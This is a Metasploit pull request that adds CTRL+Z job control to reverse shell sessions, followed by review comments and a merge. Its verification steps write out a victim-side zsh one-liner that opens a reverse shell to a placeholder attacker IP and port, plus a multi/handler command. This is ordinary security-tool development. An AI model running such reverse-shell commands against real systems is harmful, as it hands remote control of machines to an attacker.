### PR TITLE
[GSoC] Implementation of CTRL+Z in reverse shell session

### PR DESCRIPTION
**Pull request by WangYihang**
## Description

Implementation of CTRL+Z to send a SIGINT signal to the reverse shell session
> * CTRL+C signal implementation #10448
> * Notice that this implementation relies on this pull request #10220 

## Verification of CTRL+Z

> Attacker side
- [ ] `./msfconsole -qx 'use multi/handler; set payload cmd/unix/reverse_zsh; set LHOST 127.0.0.1; set LPORT 4444; exploit'`

> Victim side
- [ ] `zsh -c 'zmodload zsh/net/tcp && ztcp [ATTACKER_IP] [ATTACKER_PORT] && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'`

> Attacker side

- [ ] [IMPORTANT] type `shell`, press enter (enter interactive shell mode) (output would be like this:)

```
[*] Trying to find binary(python) on target machine  
"/usr/bin/python"                                    
[*] Found python at /usr/bin/python                  
[*] Using `python` to pop up an interactive shell    
$
```

- [ ] run some commands which takes too long time so that we need to press CTRL+C to end them
```
eg: sleep 100
```

- [ ] once the command `sleep 100` is running, press CTRL+Z, then you will see:
```
Background session 1? [y/N]
```

- [ ] Press `Y`, you will background the whole reverse shell session
```
$ ^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         basic cmd/unix               127.0.0.1:4444 -> 127.0.0.1:54028 (127.0.0.1)
```
- [ ] Press `N`, you will see the foreground process on the victim machine is 
```
$ sleep 200
sleep 200
^Z
Background session 1? [y/N]  N
[*] Backgrounding foreground process in the shell session
^Z[1] + Stopped                    sleep 200
```

## Environment

- [x] Ubuntu Desktop 18.04 (Both Attacker and Victim)

### CODE REVIEW

File: 123 [hunk 1]
```diff
@@ -0,0 +1,45 @@
+root:x:0:0:root:/root:/usr/bin/zsh
```
Comment (wvu-r7) [inline 123]: I don't think you meant to commit this file?

Comment (h00die) [reply 123]: at least it wasn't shadow...

Comment (WangYihang) [reply 123]: oh, it's my fault....I accidentally submitted the test file, I will completely remove this file from the warehouse later today.

**Comment by WangYihang** [comment]
@wvu-r7 @asoto-r7 I have already deleted the useless file, If other things are good, I think could be landed~ thank you guys so much for your code review~

**Comment by asoto-r7** [comment]
Hey @WangYihang , I apologize for taking so long to land this.  Your changes worked great in Linux, but the characters sent didn't work for a Windows environment.  Instead, it caused the next command to fail.  So I wrapped both the CTRL-Z and CTRL-C commands in a quick check to avoid windows shells.

**Comment by asoto-r7** [comment]
## Release Notes

Linux command shell payloads now support sending CTRL+C and CTRL+Z to the foreground process, allowing for job control of processes that would have otherwise required launching a new payload.

**Comment by WangYihang** [comment]
That's great! Thank all the tremendous help of all you guys so much~

**Pull request merged**